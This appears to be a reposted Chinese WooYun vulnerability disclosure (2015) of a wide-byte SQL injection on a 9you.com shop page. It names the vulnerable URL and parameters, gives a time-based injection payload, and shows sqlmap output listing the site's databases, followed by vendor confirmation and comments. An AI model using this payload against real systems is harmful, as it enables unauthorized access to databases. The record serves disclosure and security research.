漏洞标题：久游网某站宽字节SQL注入

root 8个月前 (10-28) 漏洞库 | 抢沙发 0

文章评分 0 次，平均分 0.0 ：

[收起] 文章目录

漏洞详情
评价

漏洞概要关注数(11) 关注此漏洞

缺陷编号： WooYun-2015-156024

漏洞作者：路人甲

提交时间： 2015-11-26 12:25

公开时间： 2016-01-11 15:32

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： php+字符类型注射

漏洞详情

披露状态：

2015-11-26：细节已通知厂商并且等待厂商处理中
2015-11-26：厂商已经确认，细节仅向厂商公开
2015-12-06：细节向核心白帽子及相关领域专家公开
2015-12-16：细节向普通白帽子公开
2015-12-26：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

久游网（www.9you.com），2003年4月份成立于上海，中国第一代互联网游戏运营商。
　　2003年4月成立以来，久游网先后引进了《劲乐团》、《劲舞团》等经典音舞网络游戏，创下了国内首家音舞游戏百万同时在线的产业记录，开辟了音舞游戏商业化模式和品质化经营的先河。

详细说明：

Url http://shop.9you.com/yzbp/like

Data param=68&submit=73

Poc param=68%df' and sleep(1) and '1'='1&submit=73

漏洞证明：

code 区域

<code>[09:53:31] [INFO] the back-end DBMS is MySQL<br />
web application technology: PHP 5.3.29<br />
back-end DBMS: MySQL 5<br />
[09:53:31] [INFO] fetching database names<br />
[09:53:31] [INFO] fetching number of databases<br />
[09:53:31] [WARNING] time-based comparison requires larger statistical model, please wait..............................<br />
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y<br />
[09:54:05] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors <br />
4<br />
[09:54:06] [INFO] retrieved: <br />
[09:54:53] [INFO] adjusting time delay to 1 second due to good response times<br />
information_schema<br />
[10:22:10] [INFO] retrieved: aushop<br />
[10:32:40] [ERROR] invalid character detected. retrying..<br />
[10:32:40] [WARNING] increasing time delay to 2 seconds <br />
<br />
[10:32:41] [INFO] retrieved: mysql<br />
[10:40:38] [INFO] retrieved: test<br />
available databases [4]:<br />
[*] aushop<br />
[*] information_schema<br />
[*] mysql<br />
[*] test</code>

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-11-26 13:52

厂商回复：

非常感谢。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价
(共0人评价):

登陆后才能进行评分

评价

2015-11-26 12:30 |
Honker红颜
( 普通白帽子 |
Rank:157 漏洞数:53 | 皖南人士,90后宅男,自学成才,天朝教育失败....)

0

期待详情

1#
回复此人
2015-12-16 17:33 |
missy
( 普通白帽子 |
Rank:854 漏洞数:227 | .....-3-3-3-3-3-3-3-3-3-3-3-3-3)

0

提醒：级别足够但是无法查看 Rank 高于自己的白帽子漏洞

2#
回复此人